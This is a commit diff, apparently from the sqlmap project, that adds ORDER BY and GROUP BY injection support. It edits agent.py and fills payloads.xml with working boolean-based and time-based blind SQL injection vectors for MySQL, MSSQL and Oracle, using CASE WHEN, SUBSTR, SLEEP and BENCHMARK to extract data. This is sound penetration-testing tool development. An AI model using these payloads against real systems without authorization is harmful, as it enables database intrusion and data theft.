Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 9d55c4d

Browse files
bdamelebdamele
committed
Done with support for injection in ORDER BY and GROUP BY (hopefully)
1 parent 91c3cf8 commit 9d55c4d

2 files changed

Lines changed: 39 additions & 35 deletions

File tree

lib/core/agent.py

Lines changed: 9 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -155,14 +155,14 @@ def prefixQuery(self, string):
155155
# payload, do not put a space after the prefix
156156
if kb.technique == 4:
157157
query = kb.injection.prefix
158+
elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
159+
if kb.technique != 3:
160+
query = kb.injection.prefix
158161
elif kb.technique and kb.technique in kb.injection.data:
159162
where = kb.injection.data[kb.technique].where
160163

161164
if where == 3:
162165
query = kb.injection.prefix
163-
elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
164-
if kb.technique != 3:
165-
query = kb.injection.prefix
166166

167167
if query is None:
168168
query = "%s " % kb.injection.prefix
@@ -212,6 +212,12 @@ def cleanupPayload(self, payload, origvalue=None):
212212

213213
payload = payload.replace("[ORIGVALUE]", origvalue)
214214

215+
if kb.dbms is not None:
216+
# NOTE: ugly hack due to queries.xml's <inference> tag
217+
# starting with 'AND ' string
218+
inferenceQuery = queries[kb.dbms].inference.query[4:]
219+
payload = payload.replace("[INFERENCE]", inferenceQuery)
220+
215221
return payload
216222

217223
def getComment(self, reqObj):

xml/payloads.xml

Lines changed: 30 additions & 32 deletions
Original file line numberDiff line numberDiff line change
@@ -402,7 +402,6 @@ Formats:
402402
<risk>1</risk>
403403
<clause>1</clause>
404404
<where>1</where>
405-
<vector></vector>
406405
<request>
407406
<payload>AND [RANDNUM]=[RANDNUM]</payload>
408407
</request>
@@ -418,7 +417,6 @@ Formats:
418417
<risk>3</risk>
419418
<clause>1</clause>
420419
<where>1</where>
421-
<vector></vector>
422420
<request>
423421
<payload>OR [RANDNUM]=[RANDNUM]</payload>
424422
</request>
@@ -430,14 +428,32 @@ Formats:
430428

431429

432430
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
431+
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
432+
<!-- NOTE: this does not behave as expected against SQLite -->
433+
<test>
434+
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
435+
<stype>1</stype>
436+
<level>3</level>
437+
<risk>1</risk>
438+
<clause>2,3</clause>
439+
<where>1</where>
440+
<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
441+
<request>
442+
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
443+
</request>
444+
<response>
445+
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
446+
</response>
447+
</test>
448+
433449
<test>
434450
<title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
435451
<stype>1</stype>
436452
<level>3</level>
437453
<risk>1</risk>
438454
<clause>2,3</clause>
439455
<where>1</where>
440-
<vector></vector>
456+
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
441457
<request>
442458
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
443459
</request>
@@ -457,7 +473,7 @@ Formats:
457473
<risk>1</risk>
458474
<clause>2,3</clause>
459475
<where>1</where>
460-
<vector></vector>
476+
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
461477
<request>
462478
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
463479
</request>
@@ -476,7 +492,7 @@ Formats:
476492
<risk>1</risk>
477493
<clause>3</clause>
478494
<where>1</where>
479-
<vector></vector>
495+
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
480496
<request>
481497
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
482498
</request>
@@ -495,7 +511,7 @@ Formats:
495511
<risk>1</risk>
496512
<clause>3</clause>
497513
<where>1</where>
498-
<vector></vector>
514+
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
499515
<request>
500516
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
501517
</request>
@@ -507,24 +523,6 @@ Formats:
507523
</details>
508524
</test>
509525

510-
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
511-
<!-- NOTE: this does not behave as expected against SQLite -->
512-
<test>
513-
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
514-
<stype>1</stype>
515-
<level>3</level>
516-
<risk>1</risk>
517-
<clause>2,3</clause>
518-
<where>1</where>
519-
<vector></vector>
520-
<request>
521-
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
522-
</request>
523-
<response>
524-
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
525-
</response>
526-
</test>
527-
528526
<test>
529527
<title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
530528
<stype>1</stype>
@@ -552,7 +550,7 @@ Formats:
552550
<risk>1</risk>
553551
<clause>2,3</clause>
554552
<where>3</where>
555-
<vector></vector>
553+
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
556554
<request>
557555
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
558556
</request>
@@ -571,7 +569,7 @@ Formats:
571569
<risk>1</risk>
572570
<clause>3</clause>
573571
<where>3</where>
574-
<vector></vector>
572+
<vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
575573
<request>
576574
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
577575
</request>
@@ -590,7 +588,7 @@ Formats:
590588
<risk>1</risk>
591589
<clause>3</clause>
592590
<where>3</where>
593-
<vector></vector>
591+
<vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
594592
<request>
595593
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
596594
</request>
@@ -611,7 +609,7 @@ Formats:
611609
<risk>1</risk>
612610
<clause>2,3</clause>
613611
<where>3</where>
614-
<vector></vector>
612+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
615613
<request>
616614
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
617615
</request>
@@ -1216,7 +1214,7 @@ Formats:
12161214
<risk>1</risk>
12171215
<clause>1,2,3</clause>
12181216
<where>1</where>
1219-
<vector>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
1217+
<vector>AND IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
12201218
<request>
12211219
<payload>AND SLEEP([SLEEPTIME])</payload>
12221220
</request>
@@ -1236,7 +1234,7 @@ Formats:
12361234
<risk>1</risk>
12371235
<clause>1,2,3</clause>
12381236
<where>1</where>
1239-
<vector>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
1237+
<vector>AND IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
12401238
<request>
12411239
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
12421240
</request>
@@ -1303,7 +1301,7 @@ Formats:
13031301
<risk>3</risk>
13041302
<clause>1,2,3</clause>
13051303
<where>1</where>
1306-
<vector>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
1304+
<vector>OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
13071305
<request>
13081306
<payload>OR SLEEP([SLEEPTIME])</payload>
13091307
</request>
@@ -1323,7 +1321,7 @@ Formats:
13231321
<risk>3</risk>
13241322
<clause>1,2,3</clause>
13251323
<where>1</where>
1326-
<vector>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
1324+
<vector>OR IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
13271325
<request>
13281326
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
13291327
</request>

0 commit comments

Comments
 (0)